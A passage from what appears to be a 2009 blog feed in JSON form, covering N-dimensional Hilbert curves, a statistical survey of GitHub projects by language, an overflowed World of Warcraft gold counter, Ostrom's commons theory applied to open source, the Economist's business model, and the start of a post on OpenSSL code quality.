1x1x1..., the Gray code will traverse all the vertices of the cube\nby changing only one dimension at a time. 
Specifically, we can say that the\nN-bit Gray code is a Hilbert order traversal of the vertices of an\nN-dimensional hypercube. Effectively, this means that we can now draw the Order\n1 Hilbert curve for any dimension - so let's refresh our memories of how the\nOrder 1 curve relates to the higher orders.<\/p>\n<table class=\"spacertable\">\n    <tr>\n        <th> O1 <\/th>\n        <th> O2 <\/th>\n        <th> O3 <\/th>\n    <\/tr>\n    <tr>\n        <td>\n            <img src=\"hilbert2d-o1-marked.png\" alt=\"Hilbert 2d O1\"\/>\n        <\/td>\n        <td>\n            <img src=\"hilbert2d-o2-marked.png\" alt=\"Hilbert 2d O2\"\/>\n        <\/td>\n        <td>\n            <img src=\"hilbert2d-o3-marked.png\" alt=\"Hilbert 2d O3\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<p>Notice that as we move from one order to the next, we replace each vertex with\na sub-curve that has the same shape as the <strong>O1<\/strong> traversal. I've marked one\npath through this recursive process in the images above, showing the subcurve\nfor the upper-left vertex in every step of the recursion. At every step, we\nalso need to transform the subcurve through rotation and reflection to make\nsure that its start matches the end of the previous subcurve, and its end\nmatches the beginning of the next subcurve. This process generalises trivially\nto N dimensions. Since the <strong>O1<\/strong> curve is just a Gray code traversal of the\nN-dimensional cube, we can think of the Order M Hilbert curve as a collection\nof hypercubes nested M deep.<\/p>\n<p>Now, let's see if we can use this construction process to figure out the\nco-ordinates of a point, given the offset along the Hilbert curve. We'll ignore\nthe rotations and reflections for the moment. We start with the <strong>O1<\/strong> curve of\ndimension N, and the N most significant bits of the offset. By checking which\nvertex of the hypercube this maps to, we can peel off the most significant bit\nof each co-ordinate. 
For example, if we wanted to locate offset 63 in the\n2-dimensional Order 3 curve (the upper-left corner), our first two bits would\nbe (1, 1). This is the fourth point in the Gray code traversal of the\nhypercube, which gives us the upper-left quadrant of the <strong>O1<\/strong> cube. We now\nknow that the most significant bit of our X co-ordinate is 0, and the most\nsignificant bit of our Y co-ordinate is 1. Doing the same thing for the\nmatching sub-hypercube in the <strong>O2<\/strong> curve will give us the next bit, and we\ncan drill down through the hypercubes in this way peeling off one bit of each\nco-ordinate, until we have all M bits.  This process also works in reverse - if\nwe start with a set of co-ordinates, we can drill down through the hypercubes,\ndetermining N bits of the curve offset at every step. So, generally, at every\nstep of the Gray code recursion we get a nested hypercube of dimension N, and N\nbits of co-ordinate or offset information.  Finally, we need to deal with the\nrotations and reflections required to make the heads and tails of the Gray code\nsubcurves match up. We'll need to perform this transformation at every step,\nbefore we extract our information bits. All we need is a way to rotate and\nreflect a given hypercube to make its beginning and end match up with its\nposition on the curve. The transform required turns out to map to a simple set\nof bit operations described in Section 2.3.1 of Hamilton's paper.<\/p>\n<p>And that's it - using this general process, we can now calculate co-ordinates\nor offsets for points on an N-dimensional Hilbert curve. Hopefully, I've\nmanaged to give some intuition for how this algorithm works, but I've glossed\nover pretty much all the details. See the original paper or the code I'm\npublishing for specifics. 
I should also note in passing that this is just one\nway to draw the Hilbert curve - at higher dimensions there are many, many\ndifferent well-formed Hilbert curves.<\/p>\n<h2 id=\"a-portrait-of-the-hilbert-curve-as-a-young-fruit-salad\">A portrait of the Hilbert curve as a young fruit salad<\/h2>\n<p>At last we are in a position to traverse the 3-dimensional RGB cube in Hilbert\norder, and have another stab at visualising the 2d Hilbert curve.<\/p>\n<div class=\"media\">\n    <a href=\"hilbert-hilbert-fullsize.png\">\n        <img src=\"hilbert-hilbert-small.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Hilbert on Hilbert\n    <\/div>\n    \n<\/div>\n<p>Ladies and gentlemen, I present a Hilbert curve traversal of the\nthree-dimensional RGB colour space, projected onto a two-dimensional Hilbert\ncurve covering the plane. I think it's absolutely damn beautiful. Like some\nweird piece of abstract art - a Kandinsky or perhaps a Pollock - the more you\nlook at this image, the more structure you see. If you divide it into quadrants,\nand sub-quadrants, and sub-sub-quadrants, you can trace the path of the Hilbert\ncurve at every level of recursion by following the flow of colours (use the 2d\nHilbert curves elsewhere in this post for reference if you're having trouble).\nIf you're looking at the full-size image, this works even at very large\nmagnifications, until the human ability to perceive colour differences starts to\nfail. Incredibly, this image contains <em>exactly<\/em> the same set of colours as the\nunattractive Zigzag visualisation at the start of the post - the only difference\nis the way the colours are arranged. 
This is so remarkable that you might want\nto verify this yourself using the colour analysis functionality of your\nfavourite image editor (make sure you use the full-size images for best effect).\nWe've also achieved the goal we set out with - the clustering properties of the\n2d Hilbert curve are directly visible as patches of similar colour.<\/p>\n<p>By the way - if Hilbert curves float your boat, you may also be interested in a\nprevious post of mine, in which I <a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/explorer\/\">visualise an IP geolocation database with\nHilbert curves<\/a>.<\/p>\n<h2 id=\"the-code\">The code<\/h2>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">git<\/span><span style=\"color: #032F62;\"> clone git:\/\/github.com\/cortesi\/scurve.git<\/span><\/span><\/code><\/pre>\n<p>I've released the code used to render the images in this article as a Python\nproject called <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/scurve\">scurve<\/a> (for space-filling\ncurve). This project aims to be a collection of clear implementations of\nalgorithms related to space-filling curves, together with a set of tools for\nvisualising them. 
If you're interested in this kind of thing keep an eye on the\nproject - I plan to add more interesting goodies in the next few weeks.<\/p>\n"},{"title":"The impact of language choice on github projects","published":"2009-12-15T00:00:00+00:00","updated":"2009-12-15T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/devsurvey\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/devsurvey\/","content":"<p>Although I spend a lot of my play-time fooling about with other languages, my\nprofessional and released code consists of Python, C, C++ and, alas, Javascript.\nI've lived in this tiny corner of the magic garden of modern software\ndevelopment for 10 years, and I'm itching to strike out in a different direction\nfor my next project. With this in mind, I've started to wonder about the impact\nof language choice on the development process. Are there major differences\nbetween projects in different languages? Is it possible to quantify these\ndifferences? I decided to try to gather some hard numbers. I started by writing\na small script to watch the <a rel=\"external\" href=\"http:\/\/github.com\/timeline\">public timeline<\/a> on\n<a rel=\"external\" href=\"http:\/\/www.github.com\">github<\/a>. Over a period of weeks, I collected a list of\nabout 30 thousand active projects. Using the github API, I eliminated projects\nwith less than 3 watchers, on the basis that these are likely to be small\npersonal repositories like dotfiles, programming exercises and so forth.  After\nthis, I was left with some 5000 repositories, which I checked out, giving me\nabout 55G of data to work with. The next step was to analyse the data,\nextracting commits, committers and line counts for each file type contained in\neach project. Lastly, I got rid of duplicate projects by looking for matching\ncommit hashes. From start to end, this process took more than a week to\ncomplete. 
The end result is a database consisting of 3 400 repositories,\n20 000 authors, and 1.5 million commits. I'm releasing the dataset for others to\nplay with - see the bottom of this post for information.<\/p>\n<p>The rest of this post takes a basic look at the numbers for 12 languages. I had\nto leave some out for lack of data. Haskell, for example, didn't make the cut\nwith only 18 projects. Ah, well.<\/p>\n<p>Let's look at the numbers.<\/p>\n<h2 id=\"the-basics\">The Basics<\/h2>\n<p>Let's start with a quick overview of the basics of the dataset.<\/p>\n<div class=\"media\">\n    <a href=\"samplesize.png\">\n        <img src=\"samplesize.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Sample size\n    <\/div>\n    \n<\/div>\n<p>First, the sample size. Clearly, github is very popular with the Ruby crowd,\nwith more than four times as many projects as Python, the runner-up. The sample\nsizes for C#, Erlang and Scala are pretty small, so the results for these\nlanguages aren't as firm as for the others.<\/p>\n<div class=\"media\">\n    <a href=\"median_contributors.png\">\n        <img src=\"median_contributors.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Median contributors\n    <\/div>\n    \n<\/div>\n<p>This graph shows the median number of contributors to projects in each language.\nThe red line here and in the graphs below is the median for all projects in the\ndataset. <strong>Most projects have around 3 contributors, with Perl and Java projects\nhaving about 5, and Javascript and Objective C around 2<\/strong>.<\/p>\n<div class=\"media\">\n    <a href=\"median_commits.png\">\n        <img src=\"median_commits.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Median commits\n    <\/div>\n    \n<\/div>\n<p>Here we see the median number of commits for projects in each language - in some\nsenses, we can view this as a proxy for project age. 
<strong>Most projects have around\n75 commits.<\/strong> The Perl and C++ data, however, seems significant - projects in\nthese languages on average have a much longer commit history. I suspect that\nthis is due to a decline in popularity in these languages. Recall that I\ncollected data only for projects that had recent commits. If fewer new projects\nare created in C++ and Perl, we would expect projects in these languages to be\nolder, on average.<\/p>\n<div class=\"media\">\n    <a href=\"median_commitsize.png\">\n        <img src=\"median_commitsize.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Median commit size\n    <\/div>\n    \n<\/div>\n<p>This chart shows the median commit size, in lines of code. We take the total\ncommit size to be the sum of lines inserted and the lines deleted, as reported\nby \"git log --shortstat\". <strong>Most commits touch around 19 lines of code<\/strong>.  The\nC# outlier is probably due to the small sample set. I suspect that the\ndifferences in this graph are a reflection of basic language verbosity, with\nObjective C, C++ and Java being more verbose, and Perl, Python and Ruby being\nless so.<\/p>\n<div class=\"media\">\n    <a href=\"median_commit_files.png\">\n        <img src=\"median_commit_files.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        median files touched per commit\n    <\/div>\n    \n<\/div>\n<p><strong>Most commits touch about 4 files, with C++ touching somewhat more, and Perl,\nPython and Ruby somewhat less.<\/strong> The C# outlier is probably due to small sample\nsize.<\/p>\n<h2 id=\"the-contributors\">The Contributors<\/h2>\n<div class=\"media\">\n    <a href=\"median_commits_per_contributor.png\">\n        <img src=\"median_commits_per_contributor.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Median commits per contributor\n    <\/div>\n    \n<\/div>\n<p>This shows the median number of commits contributors make. 
<strong>The average\ncontributor contributes about 5 commits to a project. C, Objective C and Ruby\ndevelopers contribute somewhat less, PHP, C#, Java and Javascript developers\nsomewhat more.<\/strong> I suspect the results for C and Ruby are due to\nprojects in these languages receiving more one-off contributions.<\/p>\n<p>An average of only 5 commits - that's not much. Let's look at this from a\ndifferent perspective - graphing the percentage of the total commits to a\nproject made by contributors.<\/p>\n<div class=\"media\">\n    <a href=\"author_commit_quantile.png\">\n        <img src=\"author_commit_quantile.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        % commits vs % contributors\n    <\/div>\n    \n<\/div>\n<p>The percentage of commits by contributors is shown on the Y axis, and the\nmatching f-value on the X axis. An f-value of 25 is the bottom\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Quartile\">quartile<\/a>, 50 is the median, and 75 is\nthe upper quartile. Looking at the Python graph, for example, we can see that\nthe bottom 75% of contributors provided a bit less than 20% of the commits. The\nshape of these graphs gives us our first take-away: <strong>For all languages, a small\nfraction of the committers do the vast majority of the work.<\/strong> This won't be\nnews to anyone in the Open Source community.  
More interesting, though, is the\nfact that <strong>C, C++ and Perl projects are significantly more \"top-heavy\" than\nthose in other languages, with a smaller core of contributors doing more of the\nwork.<\/strong><\/p>\n<h2 id=\"how-projects-evolve\">How projects evolve<\/h2>\n<div class=\"media\">\n    <a href=\"contributorsXcommits.png\">\n        <img src=\"contributorsXcommits.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Contributors vs Commits\n    <\/div>\n    \n<\/div>\n<p>This dot plot shows the total number of contributors vs the total number of\ncommits for each project. I've restricted the X and Y values - we're effectively\nlooking at the bottom-left corner of a larger dataset. The red line is a\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Local_regression\">loess<\/a> fitted curve. Over a\nlarge number of projects, we can consider the number of commits to be a measure\nof time - the graph effectively shows how quickly projects tend to accumulate\ncontributors over their lifespan. <strong>Ruby projects recruit contributors\nastoundingly well, with Python a close second. Java, Javascript and PHP\nprojects, on the other hand, do particularly badly.<\/strong> The fact that the fitted\ncurve is a nice straight line with a consistent slope shows that these results\nhold for young and old projects alike. Note that the Scala data is not\nsignificant - that nice straight line is an extrapolation by the curve fitting\nalgorithm, which is not backed up by information.<\/p>\n<div class=\"media\">\n    <a href=\"commit_age.png\">\n        <img src=\"commit_age.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Commit age\n    <\/div>\n    \n<\/div>\n<p>This graph shows the number of commits per day, over the first 300 days of a\nproject's life. To prevent skew, I only included projects that are 300 days or\nolder. The red line is a smoothed curve. 
<strong>C and Perl projects show a marked\ndecline in activity over their first year.<\/strong> I suspect that the Perl result is\ndue to the fact that it becomes harder and harder to contribute to a Perl\ncodebase, the bigger it gets. The C result is more of a mystery.<\/p>\n<h2 id=\"the-silly\">The Silly<\/h2>\n<p>And now for something silly.<\/p>\n<div class=\"media\">\n    <a href=\"swearwords.png\">\n        <img src=\"swearwords.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Swearwords per 1000 commits\n    <\/div>\n    \n<\/div>\n<p>This shows the number of swearwords used per 1000 commits. Objective C and Perl\nprogrammers are the most foul-mouthed. Java coders are more restrained, possibly\nbecause the language is more corporate, and they're afraid of having their pay\ndocked.<\/p>\n<h2 id=\"the-caveats\">The Caveats<\/h2>\n<p>There are all sorts of reasons why you should take all of this with a grain of\nsalt. There are many factors that make github projects atypical - not least of\nwhich is the use of Git for source control. The way that I collected data skews\nthe dataset in favor of projects with recent commits - unfortunately dead\nprojects aren't included. I detected a project's primary language purely based\non line count by file extension. Due to the large number of projects that\ninclude Javascript libraries in their repos wholesale, I had to apply a\nfudge-factor weighting to .js files to get reasonably sensible results.<\/p>\n<h2 id=\"you-can-play-too\">You can play too<\/h2>\n<p>I had fun playing with this dataset, and I've barely scratched the surface of\nwhat could be done with it. I'll probably squeeze another blog post or two out\nof the data, but in the meantime, I'm making the full database available so\npeople can point out the many mistakes and shortcomings of my analysis. 
At the\ntime of writing, I still have the checked-out repositories, so if you have\nsuggestions for refinements or expansions to the data, let me know.<\/p>\n<p>You can check the database out <a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/devsurvey\">here<\/a>. Be\nwarned, though - it's about 100MB of data.<\/p>\n"},{"title":"Overflowing World of Warcraft's gold counter","published":"2009-12-11T00:00:00+00:00","updated":"2009-12-11T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/wow\/beating-the-bank\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/wow\/beating-the-bank\/","content":"<div class=\"media\">\n    <a href=\"overflow.jpg\">\n        <img src=\"overflow.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Bank Overflow\n    <\/div>\n    \n<\/div>\n<p>It's a little-known fact, but my only vice... Well, one of my <em>few<\/em> vices...\nCough. <em>Amongst my vices<\/em> is the fact that I play <a rel=\"external\" href=\"http:\/\/www.worldofwarcraft.com\/\">World of\nWarcraft<\/a> with a small group of real-life\nfriends. As WoW habits go, mine is a very mild one - I don't often have time to\nplay more than one night a week. On the one night I do have, I want to raid,\nnot grind for gold to service endless repair bills. Irked by my situation, I\ndid what any red-blooded programmer would do. I wrote some code to collect\ninformation on auction house price movements, analysed my data, and implemented\na Secret Trading Strategy in the form of a Super Secret Addon (which operates,\nof course, entirely within WoW's terms of service). This has been successful\nbeyond the wildest dreams of avarice - I spend about 5 minutes a day buying and\nselling the auctions recommended by the SSA, and I make enough to bankroll my\nentire guild.<\/p>\n<p>In fact, I just noticed that I have managed to overflow the \"Total gold\nacquired\" counter in my stats tab. 
Turns out that WoW stores this figure as a\n32-bit signed integer, expressed in copper. WoW now thinks I've earned\n-1981224360 copper in total, something that can be achieved by earning more than\n230 000 gold.<\/p>\n"},{"title":"Elinor Ostrom, the commons problem and Open Source","published":"2009-12-10T00:00:00+00:00","updated":"2009-12-10T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/opensource\/ostrom\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/opensource\/ostrom\/","content":"<div class=\"media\">\n    <a href=\"bigstump.jpg\">\n        <img src=\"bigstump.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Logging in Tasmania\n    <\/div>\n    \n<\/div>\n<p>In 1968, <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Garrett_Hardin\">Garrett Hardin<\/a> coined\nthe term <a rel=\"external\" href=\"http:\/\/www.sciencemag.org\/cgi\/content\/full\/162\/3859\/1243\">\"Tragedy of the\nCommons\"<\/a> to describe\nthe economic mechanism that drives humans to destroy common resources.  The\ntragedy applies whenever a common resource is \"subtractable\" - that is, if use\nof a resource subtracts from it, making what's been extracted unavailable to\nothers. While the full benefit of appropriating the resource goes to the user,\nthe cost is shared among everyone. The consequence is that for a self-interested\nuser of the resource, the benefits of increasing use will always outweigh the\ncosts, even if the resource is ultimately destroyed in the process. Central to\nthis is the problem of freeloaders - even if the vast majority of users use a\nresource sustainably, a small number of opportunistic freeloaders can quickly\nsoak up the common benefit. The conventional economic view - first expressed by\nHardin himself - is that there are two ways to solve the commons problem:\nprivatising the resource so an owner with a direct interest can govern its use,\nor imposing regulation from \"outside\" the system. 
It's interesting to see, then,\nthat this year's Nobel Prize in Economics went to <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Elinor_Ostrom\">Elinor\nOstrom<\/a>, someone who has made a name\narguing against this fatalistic conclusion. Ostrom and her collaborators have\nproduced a huge literature studying commons that follow a third path -\nconsensual, self-generated governance that limits use to sustainable levels.<\/p>\n<p>At the heart of Ostrom's work is a simple question - how does self-governance\narise? She approaches this problem with a simple equation describing the\ncost-benefit analysis of an individual considering whether to participate in\ncommunal governance. I've modified it slightly for this post - you can find the\noriginal in the paper <a rel=\"external\" href=\"http:\/\/www.scielo.br\/pdf\/asoc\/n10\/16883.pdf\">\"Reformulating the\nCommons\"<\/a>:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>BN &gt; BE + C<\/span><\/span><\/code><\/pre>\n<p><strong>BN<\/strong> is the benefit derived under a new (presumably communal) governance\nstrategy, <strong>BE<\/strong> is the benefit derived under the existing (presumably\nnon-communal) strategy, and <strong>C<\/strong> is the cost associated with switching. It's as\nsimple as that: the benefit of participating has to exceed the cost. In essence,\nOstrom's work on the commons explores the panoply of ways in which communities\nencourage participation in commons governance by modifying this equation through\nrewards, penalties and social norms. There's no single successful strategy, and\nthe ones that do work rely on concepts like trust, reciprocity, and the types of\ninstitutional structures and individuals involved. Additional complexity comes\nfrom the interactions between subsets of users - the equation can be different\nfor every user, and coalitions and factions are common. 
The huge diversity of\nsolutions means that Ostrom's work is dirtier and more empirical than much of\neconomics, and certainly far removed from the world of identical rational actors\nin Hardin's original analysis.<\/p>\n<p>It's interesting to consider how this line of thought applies to Open Source\nprojects. Software is not a classical <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Common_pool_resource\">common pool\nresource<\/a>, because it's not\nsubtractable - there's no cost to the users or developers of a project if I\nchoose to use it. Nonetheless, an Open Source project is definitely a commons,\nin the sense that it is a community resource that thrives or starves depending\non contributions from its members. The participants in this type of commons are\nthe pool of potential contributors, rather than the pool of potential\nappropriators. In the same way that using a common pool resource applies a\nshared penalty to everyone, a contribution to the software commons benefits\neveryone. This type of non-subtractive (additive?) commons has its own version\nof the freeloader problem - it pays for a contributor to hang back and wait for\nsomeone else to add a needed feature, rather than go to the expense of adding it\nthemselves. If the contributor is a company, it might be beneficial to maintain\na competitive advantage by not contributing a change back to the community, even\nif the work has already been done. Open Source projects face an inverted form of\nthe commons problem, which can be expressed in a modified version of Ostrom's\ncommons equation:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>BC &gt; BN + C<\/span><\/span><\/code><\/pre>\n<p>Here, <strong>BC<\/strong> is the benefit of contributing, which has to outweigh the cost of\ncontributing (<strong>C<\/strong>) plus the benefit of not contributing (<strong>BN<\/strong>). 
The Open\nSource world has produced an immensely sophisticated set of norms and\ninstitutions around the terms of this equation, resulting in some of the most\nsuccessful self-governance structures on the planet. I'd argue that most of the\ninstitutional work in Open Source over the last few decades has focused on\nreducing <strong>C<\/strong> - a lot of the basic technology and accompanying social norms\nused in Open Source development (mailing lists, bug trackers, version control\nsystems, communications protocols) is lubrication to reduce the cost of\ncontributing. I think you could even make a plausible case that much of what\ndrives the Internet is just a side-effect of Open Source projects trying to\nreduce <strong>C<\/strong>.<\/p>\n<p>Another interesting train of thought is spurred by the factor <strong>BN<\/strong> - the\nbenefit of not contributing. This nicely illuminates the fundamental difference\nbetween commercial and individual contributors - for individual contributors\nwithout commercial interests, <strong>BN<\/strong> is almost always 0. For commercial\ncontributors, however, this term can be large. Consequently, we would expect\nprojects where commercial contribution is important to have measures that aim to\nreduce <strong>BN<\/strong> - penalties that minimise the benefit of not contributing to the\nproject. The outstanding example here is the Linux kernel project, which has\nfollowed a very successful two-fold path to reduce <strong>BN<\/strong>. The first, of course,\nis licensing - the GPL imposes stiff penalties (paid in terms of public outcry\nand possible legal consequences) on those failing to contribute code back to the\nproject under many circumstances. The terms of the GPL do not cover all types of\nuse, however, so there is a second tier of operational penalties for code that\nis license-compliant, but not contributed back to the project. 
To quote <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Greg_Kroah-Hartman\">Greg\nKroah-Hartman<\/a> in a <a rel=\"external\" href=\"http:\/\/howsoftwareisbuilt.com\/2009\/11\/18\/interview-with-greg-kroah-hartman-linux-kernel-devmaintainer\/\">recent\ninterview<\/a>:<\/p>\n<blockquote>\n<p>Because of our huge rate of change, [drivers] pretty much have to be in the\nkernel tree. Otherwise, keeping a driver outside the kernel is technically a\nvery difficult thing to do, because our internal kernel APIs change very,\nvery rapidly.<\/p>\n<\/blockquote>\n<p>It's interesting to consider whether this last penalty is intentional or not.\nThere are good technical reasons not to make any stability guarantees for\ninternal APIs, but at the same time I'm sure that many kernel hackers are very\naware of the fact that a rapidly-changing internal API compels companies to\ncontribute code. I don't think it's a coincidence that the most successful Open\nSource project in the world has adopted strategies to penalize potential\ncontributors for not donating code to the community. 
Reducing <strong>BN<\/strong> is one of\nthe reasons why Linux has a vastly greater commercial contribution than, say,\nFreeBSD, and is therefore a much more vibrant and active project.<\/p>\n"},{"title":"Why I subscribe to the Economist","published":"2009-11-08T00:00:00+00:00","updated":"2009-11-08T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/media\/why-i-subscribe-to-the-economist\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/media\/why-i-subscribe-to-the-economist\/","content":"<p><div class=\"media\">\n    <a href=\"economist.jpg\">\n        <img src=\"economist.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Economist\n    <\/div>\n    \n<\/div>\n<div class=\"media\">\n    <a href=\"guardian.jpg\">\n        <img src=\"guardian.jpg\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Guardian\n    <\/div>\n    \n<\/div><\/p>\n<p>I've been a long-time reader of two international papers - the <a rel=\"external\" href=\"http:\/\/www.guardianweekly.co.uk\/\">Guardian\nWeekly<\/a> and the\n<a rel=\"external\" href=\"http:\/\/www.economist.com\/\">Economist<\/a>. Over the last year, these two papers\nhave had startlingly different performance results - the Guardian Media Group\nposted a record <a rel=\"external\" href=\"http:\/\/www.pressgazette.co.uk\/story.asp?storycode=44075\">loss of $150\nmillion<\/a> for the year\nending in June, while the Economist reported a record operating <a rel=\"external\" href=\"http:\/\/www.economistgroup.com\/our_news\/press_releases\/2009\/results_for_the_year_ended_march_31st_2009.html\">profit of $92\nmillion<\/a>\nin the year ending in March. I have played my own tiny part in producing this\noutcome.  I used to buy both the Economist and the Guardian Weekly religiously\nevery week - today, I'm a paid-up subscriber to the Economist, and no longer buy\nthe Guardian at all.  
So, how did the Guardian lose my dime entirely, while The\nEconomist converted me from a news-stand purchaser to a subscriber? The answer\nto the first part of the question is simple: I no longer buy the Guardian Weekly\nbecause most of their content is available on the <a rel=\"external\" href=\"http:\/\/www.guardian.co.uk\">Guardian\nwebsite<\/a> for free (even the crosswords, which I still\nprint out and do over breakfast). I just have no incentive to fork out money for\na piece of paper containing articles I've already read. The Economist has played\nthe game rather more cleverly.  Editorial pieces that are likely to generate\ninbound links are released for free on their website, but the bulk of their\nfactual reporting remained behind a paywall. This alone would not have been\nenough to induce me to part with my hard-earned doubloons - if they stopped\nthere, I would probably just have switched to free (though probably lower\nquality) alternatives. They really hooked me by offering a complete,\nprofessionally read audio edition, delivered promptly through an RSS feed at the\nsame time as the print edition.  This means that my subscription buys me about 8\nhours of excellent audio content every week.  By contrast, the rather quaint\nperk I would receive if I subscribed to the Guardian Weekly is a \"digital paper\"\nedition - essentially a series of large zoom-able images of the laid-out paper\nthat I can't cut and paste from, link to, or even read comfortably.<\/p>\n<p>There's been a fair bit of head-scratching by pundits trying to explain The\nEconomist's unexpected success. Michael Hirschorn from the Atlantic <a rel=\"external\" href=\"http:\/\/www.theatlantic.com\/doc\/200907\/news-magazines\">just seems\nterribly confused<\/a>,\nclaiming that the Economist \"has never had much digital savvy\", and concluding\ninexplicably that it must all just be luck. 
<a rel=\"external\" href=\"http:\/\/www.niemanlab.org\/2009\/09\/clay-shirky-let-a-thousand-flowers-bloom-to-replace-newspapers-dont-build-a-paywall-around-a-public-good\/\">Clay Shirky\nthinks<\/a>\nthat the Economist is a niche financial news publication, and that its audience\nof \"traders and business people\" are willing to pay for specialist content when\nother people are not.  Both of these opinions are quite wrong. The Economist has\nplayed a cunning strategic game with considerable <em>sang-froid<\/em>, and has shown\nmuch more savvy in producing monetizable online material than the Guardian (or\nindeed the Atlantic). Despite its name, the Economist is in fact a\ngeneral-interest international newspaper, with much more space devoted to news\nand politics than business and economics. The real answer is, I think, somewhat\nsimpler: the Economist didn't abandon the basic rules of business - exchanging\nsomething of value for currency - when they moved online.<\/p>\n<p>All of this reminds me of a recent blog post by <a rel=\"external\" href=\"http:\/\/blog.amandapalmer.net\/post\/200582690\/why-i-am-not-afraid-to-take-your-money-by-amanda\">Amanda\nPalmer<\/a>,\nlead singer for the Dresden Dolls. She's fairly well known for shamelessly\nmonetizing her fanbase, an attitude she says has roots in her past as a street\nperformer. She makes a convincing case that artists have historically been\ninsulated by record companies from actually having to ask their fans for money.\nPutting your hat out and asking for coins is seen as grubby - an attitude that\nis going to have to change as record companies exit stage left and the\nconnection between performers and audiences becomes more direct. A somewhat\nanalogous thing is now happening to many news publishers - the most obvious\nalternative to selling eyeballs to advertisers is to put on a good show, and ask\nyour audience for money. 
In my case, that's exactly what the Economist did -\nthey offered me a distinctive benefit, and asked me to pay for it. And,\napparently like many other Economist subscribers, I was happy to.<\/p>\n"},{"title":"Reading Code: In praise of superficial beauty","published":"2009-11-04T00:00:00+00:00","updated":"2009-11-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/reading-code\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/reading-code\/","content":"<p>Every good programmer has gone through this. You discover a new tool, and it\nseems shapely and fit for purpose. You start using it, tentatively at first,\ngradually getting more and more used to its quirks and features. Over time,\ntrust between you grows, and your casual friendship blossoms into something\ndeeper. The program becomes part of that sacred subset of utilities you can't\nimagine yourself without. All is bliss... Then, one day, you decide to look at\nthe code.  Maybe you want to extend it, maybe you're just curious. The moment\nyou fire up your editor on the first source file, you sense that something is\nwrong.  Without reading a line, you notice a certain visual complexity to the\ncode - something to do with deeply nested and over-long functions. Looking\ncloser, you quickly realise that tangles of ifdefs snake through the source like\na canker. Weird indentation and non-idiomatic constructs are everywhere. The\nproject's structure sucks - there's no proper component isolation, its innards\nare a nest of subtle and devious co-dependencies. Beneath the skin of the\nstreamlined program you thought you were using lies a grotesque, bloated,\nunmaintainable monstrosity. You're heartbroken - you've trusted this tool for\nyears, and now it betrays you like this. 
It was all a lie - nothing will ever be\nthe same again...<\/p>\n<p>I know from personal experience that this is a very traumatic process, so it's\nwith great sympathy that I read a recent article by Marco Peereboom - an\nevocative and haunting lament with the poetic title <a rel=\"external\" href=\"http:\/\/www.peereboom.us\/assl\/html\/openssl.html\">\"OpenSSL is written by\nmonkeys\"<\/a>. Marco modestly\nclaims not to be a great programmer, but he <em>is<\/em> a contributor to OpenBSD, a\nproject that has a frankly\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Theo_de_Raadt\">psychotic<\/a> focus on code quality.\nSo, let's see what a graduate of the OpenBSD Academy of Programming makes of the\nOpenSSL codebase, as illustrated by this illuminating extract:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"c\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">#ifndef<\/span><span style=\"color: #6F42C1;\"> OPENSSL_NO_STDIO<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">\/*!<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * Load CA certs from a file into a ::STACK. Note that it is somewhat misnamed;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * it doesn&#39;t really have anything to do with clients (except that a common use<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\"> * for a stack of CAs is to send it to the client). 
